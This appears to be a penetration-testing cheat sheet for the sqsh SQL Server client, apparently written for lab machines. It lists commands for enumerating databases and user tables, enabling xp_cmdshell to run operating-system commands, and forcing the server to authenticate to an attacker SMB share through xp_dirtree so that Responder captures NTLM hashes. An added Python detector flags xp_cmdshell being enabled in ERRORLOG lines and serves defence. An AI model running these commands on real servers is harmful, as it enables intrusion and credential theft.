Sqsh

Description

Sqsh (pronounced skwish) is short for SQshelL (pronounced s-q-shell). It is intended as a replacement for the venerable 'isql' program supplied by SAP Sybase. Sqsh is much more than a nice prompt (a la 'dsql', from David B. Joyner); it is intended to provide much of the functionality of a good shell, such as variables, aliasing, redirection, pipes, backgrounding, job control, history, command substitution, and dynamic configuration. As a by-product of the design, it is also remarkably easy to extend and add functionality.

Usage

sqsh -S 10.10.10.10 -U qu35t -P 'Passw0rd!'

Enumeration

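-- list the databases on the instance
select name from sys.databases;
go
-- BACKUP is a reserved T-SQL keyword, so the database name is bracketed
select TABLE_NAME from [Backup].INFORMATION_SCHEMA.TABLES;
go
select * from [Backup].dbo.Users;
go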

Command Execution

-- xp_cmdshell is an advanced option: RECONFIGURE must run before it can be set
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell "whoami"
go
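
Every sp_configure change in the sequence above is written to the SQL Server ERRORLOG as a "Configuration option ... changed from X to Y" message, which gives defenders something to alert on. The following detector is an added example, not part of the original page: the log lines are constructed, and the function name detect_xp_cmdshell_enable is hypothetical.

```python
import re

# SQL Server writes message 15457 to its ERRORLOG for every sp_configure change.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Constructed sample ERRORLOG lines (not taken from a real server).
SAMPLE_ERRORLOG = """\
2024-03-02 09:14:07.31 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:14:07.35 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:20:11.02 spid61      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2024-03-02 10:01:45.90 spid70      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-03-02 10:05:00.12 Logon       Login failed for user 'qu35t'. Reason: Password did not match that for the login provided.
"""


def detect_xp_cmdshell_enable(errorlog_text):
    """Return one alert per xp_cmdshell 0 -> 1 change.

    Each alert also records when the same session switched on
    'show advanced options', if it did (the two-step sequence shown above).
    """
    advanced_on = {}  # spid -> timestamp of 'show advanced options' 0 -> 1
    alerts = []
    for line in errorlog_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue  # not a configuration-change message
        option = m["option"].lower()
        enabled = m["old"] == "0" and m["new"] != "0"
        if option == "show advanced options" and enabled:
            advanced_on[m["spid"]] = m["ts"]
        elif option == "xp_cmdshell" and enabled:
            alerts.append({
                "timestamp": m["ts"],
                "spid": m["spid"],
                "advanced_options_enabled_at": advanced_on.get(m["spid"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_xp_cmdshell_enable(SAMPLE_ERRORLOG):
        print(alert)
```

Session ids are reused over time, so the spid match is a correlation hint, not proof that one login made both changes.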

Get user hash

responder -I tun0
xp_dirtree "\\10.10.14.10\qu35t\"
go
xp_subdirs "\\10.10.14.10\qu35t\"
go
xp_fileexist "\\10.10.14.10\qu35t\"
go
